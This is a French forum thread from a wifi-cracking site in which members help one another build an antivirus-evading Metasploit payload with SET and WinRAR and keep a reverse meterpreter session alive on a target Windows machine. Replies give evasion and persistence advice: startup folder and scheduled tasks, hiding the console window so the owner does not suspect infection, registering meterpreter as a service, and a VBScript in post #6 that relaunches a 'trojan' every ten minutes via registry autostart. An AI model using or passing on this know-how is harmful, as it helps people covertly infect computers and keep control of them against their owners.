Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 31-05-2013 21:31:50

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Test de FUD avec SET et Winrar sans meterpreter à l'execution

Salut a tous,

J'ai voulu tester plusieurs méthodes pour créer un payload undetectable, j'ai suivi ce tuto : ici

J'ai tout suivi à la lettre, je lance armitage. Et quand j'ouvre le fameux payload sur mon pc cible, 2 shell s'ouvre et il y a été "Windows Powershell a cessé de fonctionner".

Pouvez-vous me trouver une solution ou me conseiller une autre methode?
Merci d'avance !

Dernière modification par Anthonyy59 (02-06-2013 20:23:01)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-07-2013 04:14:23

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

vire le powershell ( un des 2 .bat généré par SET ) qui n'est pas adapté à ta plateforme cible non ?
car je vient de le reproduire sur un windows 7 32 bit ( donc en virant le x64/ps64 )et cela fonctionne bien.

mais sinon il ya d'autres méthodes pour transformer un bat en exe.

De plus le "undétectable" reste relatif dans la mesure où tu ne touche pas aux template de metasploit, les modules resteront détectables, par exemple la persistence très bien détectée par Bitdefender, ou le VNC par Avast.

Hors Ligne

#3 02-07-2013 09:13:49

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

C'est vrai que j'avais pas pensé à retirer le .bat qui ne coorespond pas a la version de windows
Je vais essayer ça et je te tiens au courant !
Merci beaucoup !

Hors Ligne

#4 02-07-2013 13:27:45

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 198

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

@Warfares, question: sous windows 7 persistence peut-il se remplacer en une ligne dans un shell meterpreter avec schtasks sans mot de passe utilisateur ou droit? à voir j'ai jamais tester ...


« γνωθι σεαυτον »

Hors Ligne

#5 02-07-2013 14:16:17

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

je n'ai jamais essayé  schtasks en ligne de commande, je ne saurai te répondre, en revanche j'ai déja essayé depuis l'interface graphique de windows, et il y à quelques problèmes: oui le programme s'éxécute au lancement de windows ( , mais ce n'est vraiment pas égale au module persistence de metasploit.) =>

premièrement faut faire de la tempo dans le batch, ( moi j'utilise plein d'echo à la suite, car j'ai essayé la méthode du ping localhost mais cela semblait empécher l'ordinateur de se connecter à internet, et donc quand le "vrai payload" s'éxécute, l'ordinateur n'est pas connecté, bref ça ne fonctionne pas), le temps que l'ordinateur se connecte à internet.
ennsuite, il faut que l'ordinateur se connecte automatiquement à internet, si le propriétaire, n'a pas activé cette option, ton PAYLOAD s'éxécutera quand l'ordi n'est pas connecté, et ca ne marchera pas, ou bien si il n'est pas chez lui.

Ce qu'on perd vraiment est donc la capacité d'effectuer une tentative de connexion toute les X secondes.

après peut être que je n'ai pas suffisament cherché, mais je trouve ce gestionnaire de taches trop limité.

Je pense donc que l'idéale serait un petit programme appelant notre script/programme reverse meterpreter, toute les X secondes. Cela aurait par contre le désaventage de lancer plein de sessions meterpreter une fois que l'ordinateur cible est connecté au wifi, ce qui peut potentiellement faire planter powershell.

Pour ma part je met simplement l'exe dans le dossier démarrage, et vu que mes windows sont en mode "connexion wifi automatique", tout marche bien, avec un peu de temporisation.

à noter que la temporisation, si tu as un fenêtre de cmd qui s'affiche, et que tu veut rendre ton bazar FUD by Human, n'est pas forcément une bonne idée, car une fenetre dos qui s'affiche sans raisons au démarage, je pense que si j'était windowsien je me douterai d'une infection, et fermerai cette fenetre, donc il faut cacher cette fenetre ( voit l'autre post )

Dernière modification par warfares (02-07-2013 16:08:03)

Hors Ligne

#6 24-09-2013 13:48:50

Odonnel
Membre
Inscription : 12-09-2013
Messages : 10

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

Peut être que ça pourra aider... J'ai trouvé ça et l'ai modifié à ma sauce...
Script en vbs, par contre faut modifier le registre pour qu'il s'execute au démarage. Après ça roule.
Normalement, le "trojan" s'execute une fois, mais ne reste pas dans les processus. Donc pas besoin de l'arreter, on peut donc le relancer toutes les X secondes.

Dim WshShell
state = 1
While state = 1

Set WshShell = WScript.CreateObject("WScript.Shell")


Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")
For Each objProcess in colProcessList
if objProcess.name = "nom du fichier" then
vFound = True
End if
Next
If vFound = True then
wscript.sleep 600000    #1000 = 1s
Else
WshShell.Run ("chemin du fichier")
wscript.sleep 600000
End If
vFound = False
wend

Hors Ligne

#7 26-09-2013 18:22:22

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

Merci à toi, je vais me pencher dessus smile

Hors Ligne

#8 03-10-2013 19:40:20

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Test de FUD avec SET et Winrar sans meterpreter à l'execution

En fait, dans votre cas ici les gars il faudrait déclarer le meterpreter en tant que service Windows grâce à la commande SC, on peut voir comment [email protected] se sert pour rendre son exécutable permanent (et il faut la mériter disait-il, c'est vrai). Ce qui est intéressant, si je me souviens bien sans me tromper ça fait longtemps que j'ai oublié, c'est que cette commande n'a pas besoin du root pour ce travail et pouvant lancer un service en tant que system !

Il y a aussi le meterpreter sous forme de LOOP-VBS qui une fois lancé il est difficile de le killer, le Highlander de Metasploit. J'ai déjà eu affaire avec lui c'est un vrai emmerdeur ! il faut absolument supprimer son fichier sur le disque dur. Voici ce que fait Raz0r avec couplé à du HTTPS, un savant mélange entre Metasploit, SET et Ettercap afin de percer les lignes en territoire ennemi smile

--> La percee du meterpreter par Raz0r
Il y a des antiquités sur le forum qui valent une petite fortune.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 42 Hier 21:32:19 par tit64
4 312 20-11-2016 14:31:08 par richie
Épinglée :
21 14675 20-11-2016 12:53:07 par richie
Routeur avec antenne amovible par le flibustier
0 230 07-11-2016 19:12:24 par le flibustier
1 410 16-09-2016 14:06:28 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]